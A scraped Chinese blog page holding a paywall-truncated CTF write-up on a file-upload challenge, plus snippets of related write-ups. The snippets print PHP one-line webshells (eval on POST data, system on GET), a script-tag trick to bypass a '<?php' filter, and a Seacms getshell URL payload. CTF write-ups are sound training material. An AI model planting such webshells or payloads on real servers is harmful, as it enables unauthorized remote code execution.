“百度杯”CTF比赛 九月场 upload

最新推荐文章于 2022-07-03 18:58:12 发布
最新推荐文章于 2022-07-03 18:58:12 发布
阅读量436 收藏
点赞数
分类专栏: ctf练习 文章标签: php 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/drip_big/article/details/105430436
版权
本次“百度杯”CTF比赛中,允许上传.txt, .php.js等文件,无拦截措施。提示flag隐藏在flag.php中。通过构造JS脚本绕过过滤,执行读取flag.php内容的代码,从而获取flag。" 79624427,7520054,使用脚本管理haproxy,"['负载均衡', '系统管理', '网络服务']
摘要由CSDN通过智能技术生成

“百度杯”CTF比赛 九月场

题目内容:

想怎么传就怎么传,就是这么任性。
tips:flag在flag.php中

测试可以上传文件类型

.txt .php.js 都可以上传成功
说明在上传文件的过程中并无拦截
题目中的“想怎么传就怎么传”说的没错

构造php脚本
  1. 既然有提示“tips:flag在flag.php中 ”,故只要可以阅读flag.php的内容即可。
<?php
// get contents of a file into a string
$filename = "/usr/local/something.txt";
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
最低0.47元/天 解锁文章
「已注销」
关注
专栏目录
百度CTF比赛 九月--web Upload
hanjinrui15的博客
12-30 661
百度CTF比赛 九月--web Upload基础知识1、什么是一句话木马?2、一句话木马的简要原理3、html渲染过程解析渲染该过程主要分为以下步骤:解决方案:4、PHP中substr()函数解题思路1、代码分析2、求解题目总结 基础知识 1、什么是一句话木马? 最简单的理解就是,一句话木马上传到网站后台,然后我们可以通过提交参数等的方式去获取shell,比如拿菜刀或者蚁剑等工具。比如下面这段php一句话木马: <?php @eval($_POST['key']) ?> 【基本原理
百度CTF比赛 九月 Upload解题思路
qq_43473164的博客
05-16 1819
Hello,大家好,我是锘锘鸡。 今天分享给大家的是百度CTF比赛Upload解题思路。 先看下题目 提示flag就在flag.php中。 进入答题链接 发现是文件上传,于是好奇的锘锘鸡开始了他的第一波操作"题下留名",证明自己来过 上传成功后,锘锘鸡惊奇的发现,上传成功在html中是在a标签中的,而且直接链接到文件目录下。 锘锘鸡试着点开!!!click… 嗯??… 锘锘鸡电灯泡一...
百度CTF比赛 九月 Web-Upload
qq_34106499的博客
01-14 535
1. php一句话木马编写及使用(长标签); 2. 上传文件绕过 ` <? ' , ' php ' 的方法; 3. 菜刀连接php一句话木马;
百度CTF比赛 九月 Upload
weixin_43858799的博客
05-19 565
1、 打开题目得到这个界面 2、随便上传一个文件 上传了之后还可以打开 这里就可以尝试上传一个PHP文件来获取到flag 网页源代码显示 上传路径在u目录下 所以需要…/flag.php 返回上一级 打开flag.php 尝试上传一个php文件读取flag。php文件参考http://www.w3school.com.cn/php/php_file_open.asp <?php $ ...
百度CTF比赛 九月Upload ---------i春秋
weixin_30763397的博客
07-07 307
题目地址:https://www.ichunqiu.com/battalion 创建题目,进入题目环境,看到 文件上传的题型,先试着随便上传一个文件1.txt 直接上传成功了!查看一下源码 看到上传在这个位置,那么接下来就在文件里加一句话木马,然后上传 然后用菜刀链接 但是报错了,好像把php给过滤了,试一下用其他方式 得到flag 转载于:https:...
10.28-“百度CTF比赛 九月-Web-upload
weixin_43460822的博客
10-29 345
进入题目的页面,如图所示 根据提示,可以猜测此题用的是文件上传漏洞,通过上传一句话木门,然后用菜刀连接获取服务器控制,接着查看flag.php文件即可得到flag。 一句话木门如下: <?php @eval($_POST['Cknife']);?> 发现可以上传成功,通过查看源代码可发现上传的位置,现在通过网址访问试试: 发现过滤了<?php,这是可以试试其他的php标记...
i春秋 web“百度CTF比赛 九月-Upload & code
ChanCherry的博客
10-13 1019
百度CTF比赛 九月Upload 可以上传文件,并且上传之后可以点击源码链接打开文件,上传了这几句话: <?php @eval($POST["code"]); ?> 结果发现<?php被过滤了,于是用php脚本标记来绕过过滤: <script language="PHP"> $fh=fopen("../flag.".strtolower("PHP"),'r...
百度CTF比赛 九月——Web-Upload
Ifish的博客
05-28 2642
题目描述 解题思路 看到提示,随意上传文件,并且flag在flag.php中,创建赛题,打开链接 就简单上传一个一句话上去 &amp;amp;lt;?php @eval($_POST[&amp;quot;code&amp;quot;]); ?&amp;amp;gt; 结果显示上传成功,但是,发现把“&amp;amp;lt;”和”php ”给过滤掉了 那我们就很自然的想到PHP的长标签了 重新修改代码 &amp;am
cft-wp-百度CTF比赛 九月upload
key_nothing的博客
09-30 1012
打开连接 发现有个上传功能: 上传一句话试试:&amp;amp;amp;lt;?php @eval($_POST['pass']);?&amp;amp;amp;gt; 发现没有路径,看下源码: 找到路径,上菜刀提示连不上,猜测可能有过滤,或者文件不能被解析,先访问一下看看 发现&amp;amp;amp;lt;?php 被过滤了。。 翻阅资料找到一种php标记方法,将一句话改为: &amp;amp;amp;lt;script language=&amp
i春秋 “百度CTF比赛 九月 Upload
include_heqile的博客
09-07 588
https://www.ichunqiu.com/battalion?t=1 这道题其实很简单,就是一道文件上传题,他没有对文件类型作任何过滤,但是去过滤了文件内容php,字符串被过滤掉了,当我们上传&amp;amp;lt;?phpsystem($_GET[&amp;quot;cmd&amp;quot;]);之后,点击上传成功,查看页面源代码,会发现我们的文件被修改成了system($_GET[&amp;quot;cmd&amp;quot;]);,自然而然的我们就会
百度CTF比赛 九月 —— upload
吃肉唐僧的博客
09-07 336
打开题目,发现可以上传任意文件 构造一句话木马文件上传 居然上传成功,点开链接 发现可以查看到代码,<php 应该是被过滤掉了才显示出文本内容 换一种方式 <script language="pHp">@eval($_POST['sb'])</script> 上传,菜刀无链接 拿到flag ...
百度CTF比赛 九月,Web:Upload
Pai_Space
07-03 158
百度CTF比赛 九月,Web:Upload
百度CTF比赛 九月 Web Upload
feng的博客
09-06 260
WP 一道文件上传题,但是让我学到了新姿势。 首先打开环境,上面说可以随意上传文件。 我们直接注入一个一句话木马在shell.php,再上传上去,一句话木马是: <?php @eval($_POST['feng']);?> 上传成功后发现下方有一个链接,我们打开看看。 发现前面的<?php没有了。再经过反复的尝试,最终会发现它过滤了<?和php。这时候我就一筹莫展了,我去查<?和php被过滤了该怎么办,但是没查到,最终只能看了WP,知道这种新姿势: <script
百度CTF比赛 九月 类型:Web 题目名称:SQLi ---不需要逗号的注入技巧
wkend的博客
05-09 3890
今天在i春秋做题的时候遇到了移到非常好的题目,于是在参考了wp的基础上自己复现了一遍,算作一种技巧的学习与收藏吧。 题目i春秋连接:https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;r=54791 访问地址,发现什么都没有, 查看页面源代码,发现提示 访问地址 http://69ef94c7ef5e47b580ed5c7bae472bc4c3b...
百度CTF比赛 九月_Test(海洋cms前台getshell)
a173262565的博客
04-22 470
题目在i春秋ctf训练营 又是一道cms的通用漏洞的题,直接去百度查看通用漏洞 这里我使用的是以下这个漏洞: 海洋CMS V6.28代码执行0day 按照给出的payload,直接访问url+/search.php?searchtype=5&tid=&area=eval($_POST[1]) 之后用菜刀连接,但乍一看并没有flag.php 反手去查了...
题目内容: 想怎么传就怎么传,就是这么任性。
weixin_42695187的博客
07-07 674
打开题目 进入网页 上传一个一个一句话病毒,以.php文件格式上传 然后检查源代码
百度CTF比赛 九月
andiao1218的博客
03-23 159
Test: 题目提示查资料 打开地址,是一个海洋cms 海洋cms有个前台getshell的漏洞 在地址后加上/search.php?searchtype=5&tid=&area=eval($_POST[x]),用菜刀连接,密码为x 连接后还是找不到flag,可能flag在数据库里 找找数据库的配置文件 用菜刀连接数据库 ...
百度CTF比赛 九月 类型:Web 题目名称:SQLi
大方子
08-01 2816
收获的知识: 重定向一般发生在访问域名而且不加参数或者文件夹名,文件名这样的情况下 sql注入也要留意HTTP信息的变化 可以利用SQL map跑一下看看有没有有用的信息 不使用单引号和逗号的注入的注入技巧       发现页面空白 然后查看源文件 发现另一个页面 进去后出现   后来手测和用sqlmap跑感觉这不是一个注入点 看了别人的writeup之后发现...
php upload ctf,强网CTF防御赛ez_upload Writeup
weixin_35645813的博客
03-17 1193
这是强网拟态防御线下赛遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家。ez_upload这题算是非常经典的堆叠black trick的题目,算是比较典型的ctf题目(虽然现在大家都很抵制这样的题目),这里主要是分享Writeup以及我们队在完成题目时的思考流程。ez_upload 思考流程最开始我先描述一下题目逻辑。1、login.php,登陆页面,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值